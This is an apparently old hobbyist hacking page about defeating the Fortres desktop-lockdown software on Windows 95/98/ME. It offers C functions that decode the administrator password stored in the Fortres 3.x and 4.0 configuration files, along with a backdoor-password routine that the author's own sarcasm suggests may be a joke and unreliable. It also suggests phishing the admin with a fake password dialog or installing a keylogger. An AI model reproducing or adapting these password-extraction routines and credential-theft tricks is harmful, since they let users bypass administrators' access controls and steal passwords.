|
|
Fortres Hacking |
|
Fortres has an option to provide a backdoor key in case the admin has forgotten the password. This key appears as a number in the title bar of the password dialog. If the number begins with "5-" then you are using a version of Fortres I haven't cracked yet. Normally the admin would call up tech-support or something and they would use the backdoor key to calculate the backdoor password, which the admin would then use in place of the actual password. At least that's what I've heard. In practice, I have found that this supposedly random key is actually based on on the system clock. This little snippit of code will derive the backdoor password for you.
// key - the backdoor key
// The return value is the backdoor password
unsigned short backdoor_password( unsigned long key )
{
short x;
x = ((short)( key * -1.2456 ) + 1 ) * 65533;
x = ( x / 2 + 7 ) * 3;
x /= 2;
return x * x;
}
Great help that is huh? Well fortunately we have the facility of CGI scripts!
So the backdoor option is not enabled? Then you will have to grab the configuration file and decode its contents.
Under the default install, Fortres v3.x saves the password in a configuration file named DEFAULT.FG3 in the path C:\FORTRES.101\. I took the initiative to reverse engineer Fortres v3.x to figure out how to get the password out of this file. I got myself a disassembler and a book on assembly and started cracking. It didn't take long to find the bit of code that performed the decoding but rewriting it into C was a new challenge for me. It took about a year of working off and on to finally reduce it to these two simple functions.
// Rotate left
unsigned char rotl( unsigned char x, unsigned long pos )
{
return x << pos % 8 | x >> 8 - pos % 8;
}
// fd - an open file descriptor to DEFAULT.FG3
// password - a pointer to a buffer to be filled with the password
// len - the length of the buffer pointed to by password
// The return value is true if the password was successfully deciphered
int fortres3( FILE *fd, char *password, unsigned long len )
{
unsigned long i, j;
unsigned char buff[648], key[103];
fseek( fd, 234, SEEK_SET );
if( fread( key, 1, 103, fd ) != 103 )
return -1;
if( fread( buff, 1, 648, fd ) != 648 )
return -1;
for( i = 0, j = 0; i < 648; i++ )
buff[i] = rotl((unsigned char)( rotl( buff[i], i ) ^ key[j = ( j + 1 ) % 103] ), i ) ^ 0xB2;
buff[16] = buff[97];
buff[18] = buff[109];
buff[20] = buff[73];
buff[21] = buff[57];
for( i = 0; i < len && buff[i + 16]; i++ )
password[i] = buff[i + 16] + 0x1B;
if( password[i - 1] != 'C' )
return -1;
password[i - 1] = '\0';
return 0;
}
Tom Mecrow discovered that if backdoor passwords are disabled in 4.0 you might just be able to type "81" (the backdoor password for "0") and get in. I haven't verified this or tested it on other versions. Under the default install, Fortres v4.0 saves the password in a configuration file named APPMGR.SET in the path C:\FGC\. I took the same initiative as I did with 3.x but to no avail. Later I found this very informative page http://packetstormsecurity.nl/0004-exploits/Fortres4-analysis.txt where there was some BASIC code to decode the password. If you prefer C (I know I do), here you are.
// fd - an open file descriptor to APPMGR.SET
// password - a pointer to a buffer to be filled with the password
// len - the length of the buffer pointed to by password
// The return value is true if the password was successfully deciphered
int fortres4( FILE *fd, char *password, unsigned long len )
{
unsigned long i, j;
unsigned char buff[455];
if( fread( buff, 1, 455, fd ) != 455 )
return -1;
for( i = 0, j = 4; i < len - 1; i++, j += 18 )
{
password[i] = (char)( buff[j] - buff[454 - i] + i * 3 );
if( isalpha( password[i] ) && !isupper( password[i] ) || !isprint( password[i] ))
break;
}
password[i] = '\0';
return 0;
}
Here comes the CGI again!
A less sophisticated way (meaning I didn't have to write any code) is simply to trick the admin into telling you the password. A very creative friend of mine *cough*MIKE*cough* found that creating a fake Fortres password and configuration dialog to be a very effective way of tricking the admin. The fake password dialog would save the password typed in by the admin to a file and then display a fake configuration dialog (whether the password was correct or not) where only a few controls worked. A similar method would be to just install a keylogger.
Of course this will only work for machines running Microsoft Windows 95/98/ME. I didn't have much access to NT/2K machines when I was fighting Fortres so I will need some feedback from anyone who has experience.
DeFortres is the GUI version of all this code. See the Software page.